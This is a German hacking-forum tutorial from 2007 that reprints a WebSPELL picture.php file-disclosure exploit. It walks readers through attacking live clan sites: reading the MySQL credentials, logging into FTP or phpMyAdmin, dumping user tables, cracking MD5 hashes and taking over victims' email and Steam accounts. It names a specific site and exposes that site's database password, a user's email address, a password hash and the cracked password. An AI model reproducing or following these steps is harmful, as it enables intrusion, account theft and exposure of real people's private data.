[Hacking] Webspell ganz einfach via Exploit hacken

°EraZoR° · 19. Juli 2007

Webspell ganz einfach via Exploit hacken

Webspell hacken via Exploit

Das Exploit:

Code:

# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability
# Discovered by: Trex
# Visit: www.Trex-Online.net / www.UnderGround.ag
# Comment: Happy easter!
#
# ___ ___
# / \ / \ ___________________________
# / / \_/ \ \ / \
# \__/\ /\__/ / GIVE ME A CARROT OR I WILL \
# \O O/ \ BLOW UP YOUR HOUSE /
# ___/ ^ \___ / ___________________________/
# \___/ /_/
# _/ \_
# __// \\__
# /___\/_\/___\
#
#
#
# Vulnerability 1:
# Advantage: works independently from PHP version.
# Disadvantage: works dependently from PHP option register_globals (= on).
#
# http://[SITE][PAHT]/picture.php?file=[FILE]
#
#
#
# Vulnerability 2:
# Advantage: works independently from PHP option register_globals.
# Disadvantage: works dependently from PHP versions (< 4.3.0).
#
# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00
#
#
#
# Solution:
# http://fixes.trex-online.net/picture.rar

# milw0rm.com [2007-04-05]

found by http://www.milw0rm.com

So das ganze ist sehr einfach.
Ihr geht auf Google und sucht nach:
XTREAM-TEAM-CLAN
oder ihr habt eine Seite die ihr hacken wollt...

Ich nehme jetzt als Beispiel die Seite "http://hossi.ho.ohost.de/"

Von den Ergebnissen sucht ihr euch eine Seite aus und öffnet sie.
Nun ersetzt ihr das:

Code:

http://hossi.ho.ohost.de/[B][U]index.php?site=news&action=archive[/U][/B]

mit:

Code:

http://hossi.ho.ohost.de/[B][U]picture.php?file=_mysql.php[/U][/B]

um Zugriff auf die MySQL-Datenbank zu erhalten, wo die User-Daten gespeichert sind.

Nun geht ihr auf die Seite:

Code:

http://hossi.ho.ohost.de/picture.php?file=_mysql.php

und es erscheint eine weiße Seite.
Ist aber alles richtig, deswegen macht einen Rechtsklick und geht auf:
"Seitenquelltext anzeigen"

Nun seht ihr die MySQL-Daten, sprich Passwort und Usernamen.
Bei unserem Beispiel sieht das ganze dann so aus:

Code:

<?php
 $host = "localhost";
 $user = "hossi";
 $pwd = "darkkrone2";
 $db = "hossi";
 define(PREFIX, 'webs_');
?>

Der Username ist also:
"hossi"
Und das Passwort:
"darkkrone2"

Ihr habt 2 Möglichkeiten:

1. Ihr loggt euch auf dem FTP der Homepage ein

Ihr öffnet euren FTP-Clienten und gebt:
"ftp://eureseite.de"
ein.
Also:
"ftp://hossi.ho.ohost.de/"
Gebt Username und Passwort ein und könntet jetzt die ganze Page löschen...

2. Ihr hackt die Datenbank

Ihr geht auf:
phpmyadmin.eureseite.de
also:
phpmyadmin.hossi.ho.ohost.de/

Nun geben wir die Daten ein und sehen die MySQL Datenbank.
Ihr geht ganz links auf den Username also im Bsp:
"hossi (66)" <- die 66 bedeutet die Anzahl der Tabellen...
scrollt ganz nach unten und geht bei "webs_user" auf Bild

.

Nun seht ihr die Login-Namen, Passwörter, E-Mail-Adressen und alles andere was die User zu sich angegeben haben.
Ihr sucht euch einen User aus, kopiert den Passwort-Hash...
In unserem Beispiel nehme ich:
Username:
shadow_TZ
Passwort-Hash:
e2d8001eb66b01bd0601c1d3b23c9028
E-Mail:
zenkerthorsten@web.de

Jetzt gehen wir auf:

md5cracker.de - de beste bron van informatie over md5cracker. Deze website is te koop!

geben den Hash dort ein und erhalten:
GDataOnline - Hash gefunden - Plain: shadow88

Das Passwort ist also "shadow88".

Jetzt habt ihr wieder 2 Möglichkeiten:

1. Ihr könnt euch im E-Mail Acc einloggen:
Ihr geht auf die Seite des E-Mail Hosters und loggt euch mit der E-Mail-Adresse und Passwort ein.
Sollte das Passwort das gleiche sein wie auf der Clan-Page könnt ihr seinen Steam-Account o.ä. abziehen.

2. Ihr loggt euch auf der Clan-Page ein.
Ihr geht also zurück auf die Clan-Page und loggt euch ein.
Wenn der User Admin-Rechte hat, könnt ihr News schreiben, User löschen etc.
Wenn nicht, ist das ganze relativ unwichtig.

Das wars schon....

Ich hoffe es hat euch gefallen und ihr gebt mir ne Bewertung...

Mfg
°EraZoR°

Anzeige

Nützliche Suchen

[Hacking] Webspell ganz einfach via Exploit hacken

Videos zum Themenbereich